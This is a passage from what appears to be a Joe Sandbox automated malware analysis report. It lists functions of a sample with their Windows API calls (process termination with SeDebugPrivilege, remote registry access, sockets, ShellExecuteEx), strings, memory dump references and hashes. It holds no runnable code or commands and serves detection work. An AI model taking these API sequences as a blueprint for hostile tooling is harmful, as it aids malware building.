                                                                                                                  • Instruction Fuzzy Hash: DA518071D00299DBCF64EF99C8817ADB7B2FF94314F28816AD818B7251E7309D85CBA0
                                                                                                                  Function 00E49A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E49B19
                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E49B2D
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E49B47
                                                                                                                  • _wcscat.LIBCMT ref: 00E49BA2
                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E49BB9
                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E49BE7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                  • String ID: SysListView32
                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                  • Opcode ID: 6e50a6e3d0fd8c9a651eb537108ec0e83eeffc89e354d889ba115fae1f2eeb4b
                                                                                                                  • Instruction ID: 471366894fd998d1d8d9b11ea261df1b4e295810929054aeffc625aaa75962cf
                                                                                                                  • Opcode Fuzzy Hash: 6e50a6e3d0fd8c9a651eb537108ec0e83eeffc89e354d889ba115fae1f2eeb4b
                                                                                                                  • Instruction Fuzzy Hash: 5D41A070A40308AFEB219FA4EC85BEF77A8EF48354F10542AF545F7292C6B19D84CB64
                                                                                                                  Function 00E4172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E26532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E26554
                                                                                                                    • Part of subcall function 00E26532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E26564
                                                                                                                    • Part of subcall function 00E26532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00E265F9
                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E4179A
                                                                                                                  • GetLastError.KERNEL32 ref: 00E417AD
                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E417D9
                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E41855
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00E41860
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00E41895
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                  • Opcode ID: 369cd971fd9aae92b8c17f29fecbe3349d400d412fbc1f71f25883f638fa1649
                                                                                                                  • Instruction ID: 4c9e139dea4e0ae3e64638961c2e1401148b0db862f82b0c74e4b91d41faea8b
                                                                                                                  • Opcode Fuzzy Hash: 369cd971fd9aae92b8c17f29fecbe3349d400d412fbc1f71f25883f638fa1649
                                                                                                                  • Instruction Fuzzy Hash: E841B171700200AFDB15EF55ED95FBE77E1AF08304F099098FA06AF2D2DBB4A9448B61
                                                                                                                  Function 00E25819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00E258B8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconLoad
                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                  • Opcode ID: 6290e3311366e59c7e5b6a062658e6e6ee4002cecb3998a3873e2e241bf8f9c8
                                                                                                                  • Instruction ID: b2f5652b3f2b32f8249b6ffa39300f9825b8fbe6ed6ccec54d1496bedd511dc5
                                                                                                                  • Opcode Fuzzy Hash: 6290e3311366e59c7e5b6a062658e6e6ee4002cecb3998a3873e2e241bf8f9c8
                                                                                                                  • Instruction Fuzzy Hash: 8911D87770D756BAEB1D5B65AD82DAA63DC9F16314F20103AF501F52C2E7F0AA404264
                                                                                                                  Function 00E2A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00E2A806
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafeVartype
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1725837607-0
                                                                                                                  • Opcode ID: 015a5a0df5d61fae42e37966b7aa7fb2a721afbf9356c64b29de5bea923d10fb
                                                                                                                  • Instruction ID: 4309e6a41c4ce6c9a5ed45f9c6eea4711db65ab6c0a27dc92fe83fa68ec5eba8
                                                                                                                  • Opcode Fuzzy Hash: 015a5a0df5d61fae42e37966b7aa7fb2a721afbf9356c64b29de5bea923d10fb
                                                                                                                  • Instruction Fuzzy Hash: 90C17E71A042299FDB04CF98E485BAEB7F4FF08314F28947AE616F7241D734A945CBA1
                                                                                                                  Function 00E26B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E26B63
                                                                                                                  • LoadStringW.USER32(00000000), ref: 00E26B6A
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E26B80
                                                                                                                  • LoadStringW.USER32(00000000), ref: 00E26B87
                                                                                                                  • _wprintf.LIBCMT ref: 00E26BAD
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E26BCB
                                                                                                                  Strings
                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00E26BA8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                  • Opcode ID: 257112ac6420f7528d8b4761552b241b98bd6a9e8a5372bd1a01136e939549a6
                                                                                                                  • Instruction ID: 5cb6c3a1d1ea1410c6ebc912eb751451bea5167178ceeadf169bfee37bc79d58
                                                                                                                  • Opcode Fuzzy Hash: 257112ac6420f7528d8b4761552b241b98bd6a9e8a5372bd1a01136e939549a6
                                                                                                                  • Instruction Fuzzy Hash: 6A0162F6904218BFEB11A7A1AD89EE7766CD708344F404491F756F2041EAB49E888B70
                                                                                                                  Function 00E42B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E42BB5,?,?), ref: 00E43C1D
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E42BF6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharConnectRegistryUpper
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2595220575-0
                                                                                                                  • Opcode ID: f1a5e5512abf6bd80e477a9932fb6150b43e39d797f5f1b848c10e97b479d096
                                                                                                                  • Instruction ID: dcd9986b2ccd62c26bad9b9cbceac2c1a17c47538ad565add0faaf35a7ac54c7
                                                                                                                  • Opcode Fuzzy Hash: f1a5e5512abf6bd80e477a9932fb6150b43e39d797f5f1b848c10e97b479d096
                                                                                                                  • Instruction Fuzzy Hash: 5C91AA316042009FCB10EF15D891B6EB7F5FF88314F54981DFA96A72A2DB70E905CB62
                                                                                                                  Function 00E0A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __mtinitlocknum.LIBCMT ref: 00E0A991
                                                                                                                    • Part of subcall function 00E07D7C: __FF_MSGBANNER.LIBCMT ref: 00E07D91
                                                                                                                    • Part of subcall function 00E07D7C: __NMSG_WRITE.LIBCMT ref: 00E07D98
                                                                                                                    • Part of subcall function 00E07D7C: __malloc_crt.LIBCMT ref: 00E07DB8
                                                                                                                  • __lock.LIBCMT ref: 00E0A9A4
                                                                                                                  • __lock.LIBCMT ref: 00E0A9F0
                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00E96DE0,00000018,00E15E7B,?,00000000,00000109), ref: 00E0AA0C
                                                                                                                  • RtlEnterCriticalSection.NTDLL(8000000C), ref: 00E0AA29
                                                                                                                  • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00E0AA39
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1422805418-0
                                                                                                                  • Opcode ID: 58927370be3092de4e96983bb6c43867ece04fe321afad6e6cea05f5ea08fbf4
                                                                                                                  • Instruction ID: 617c44da6638c1a7f3c55ea16e8ecd2704a3f863d593a0d8dddadc8d96deeece
                                                                                                                  • Opcode Fuzzy Hash: 58927370be3092de4e96983bb6c43867ece04fe321afad6e6cea05f5ea08fbf4
                                                                                                                  • Instruction Fuzzy Hash: 83411671F003099FEB149F69DA4479DB7B0AF45338F189328E425BB2E1D7749884CB91
                                                                                                                  Function 00E48ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00E48EE4
                                                                                                                  • GetDC.USER32(00000000), ref: 00E48EEC
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E48EF7
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00E48F03
                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00E48F3F
                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E48F50
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E4BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00E48F8A
                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E48FAA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3864802216-0
                                                                                                                  • Opcode ID: 25e6d06518e258e77f371d26f8770f9676c810f58b1eea9a4b9f998f122093fb
                                                                                                                  • Instruction ID: 91aed69e3b06471e4092994bf832639bd6deccc6785207a6c5144c16e2072685
                                                                                                                  • Opcode Fuzzy Hash: 25e6d06518e258e77f371d26f8770f9676c810f58b1eea9a4b9f998f122093fb
                                                                                                                  • Instruction Fuzzy Hash: E931BC72204214BFEB108F51EC4AFEB3BAEEF49765F044064FE09AA191CAB59845CB70
                                                                                                                  Function 00E316DA Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 309COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                    • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
                                                                                                                    • Part of subcall function 00DFC6F4: _wcscpy.LIBCMT ref: 00DFC717
                                                                                                                  • _wcstok.LIBCMT ref: 00E3184E
                                                                                                                  • _wcscpy.LIBCMT ref: 00E318DD
                                                                                                                  • _memset.LIBCMT ref: 00E31910
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                  • String ID: X$p2
                                                                                                                  • API String ID: 774024439-3332900272
                                                                                                                  • Opcode ID: 9d8b096e0efe10bd1d312a22dd4abea6854674ee6f9f33bbec0ee504d3ea41ec
                                                                                                                  • Instruction ID: e789718ea9bd3e7f80e519427a450f7b10d48519b02f5b16fd33c288c597c7d6
                                                                                                                  • Opcode Fuzzy Hash: 9d8b096e0efe10bd1d312a22dd4abea6854674ee6f9f33bbec0ee504d3ea41ec
                                                                                                                  • Instruction Fuzzy Hash: 78C170355083809FC724EF24C895A9EBBE1FF85354F00596DF599A72A2DB30ED05CBA2
                                                                                                                  Function 00E395BF Relevance: 10.7, APIs: 7, Instructions: 247networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • select.WS2_32 ref: 00E39691
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00E3969E
                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 00E396C8
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00E396F8
                                                                                                                  • htons.WS2_32(?), ref: 00E397AA
                                                                                                                  • inet_ntoa.WS2_32(?), ref: 00E39765
                                                                                                                    • Part of subcall function 00E1D2FF: _strlen.LIBCMT ref: 00E1D309
                                                                                                                  • _strlen.LIBCMT ref: 00E39800
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3480843537-0
                                                                                                                  • Opcode ID: 28802d547be4c6a0c22b3efa4c89df019205e943036b1fee22c92386e6401db2
                                                                                                                  • Instruction ID: 9e13a590febf7ead7893e70b46c290620a48fc53061822c8fc51b90f3740ac2b
                                                                                                                  • Opcode Fuzzy Hash: 28802d547be4c6a0c22b3efa4c89df019205e943036b1fee22c92386e6401db2
                                                                                                                  • Instruction Fuzzy Hash: 0D81DF31508240AFC314EF65DC8AE6FBBE8EF85714F10461DF555AB292EBB0D904CBA2
                                                                                                                  Function 00DFAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 28c52fe6023cb6c2358d343093f56c1737e4acdb60cb3258df0eee4b46e94b15
                                                                                                                  • Instruction ID: fb8f4dd1376ec6245f8f0354c691b448fd7bd645f340f91d4214be5a4ec9fc62
                                                                                                                  • Opcode Fuzzy Hash: 28c52fe6023cb6c2358d343093f56c1737e4acdb60cb3258df0eee4b46e94b15
                                                                                                                  • Instruction Fuzzy Hash: 63714AB1904109EFCB14CF98CC89ABEBB79FF85314F25C149FA19AA255C730AA45CB71
                                                                                                                  Function 00E42230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E4225A
                                                                                                                  • _memset.LIBCMT ref: 00E42323
                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00E42368
                                                                                                                    • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                    • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
                                                                                                                    • Part of subcall function 00DFC6F4: _wcscpy.LIBCMT ref: 00DFC717
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00E4242F
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00E4243E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 4082843840-2766056989
                                                                                                                  • Opcode ID: 5a384ba09bd9194df64896037848493d99d40b223e96484c3f79da4ce3f3fe95
                                                                                                                  • Instruction ID: 089ef2fd6bca5edd8ca01e487b85ede62a2592a64abfadd5678a69bc346ee29b
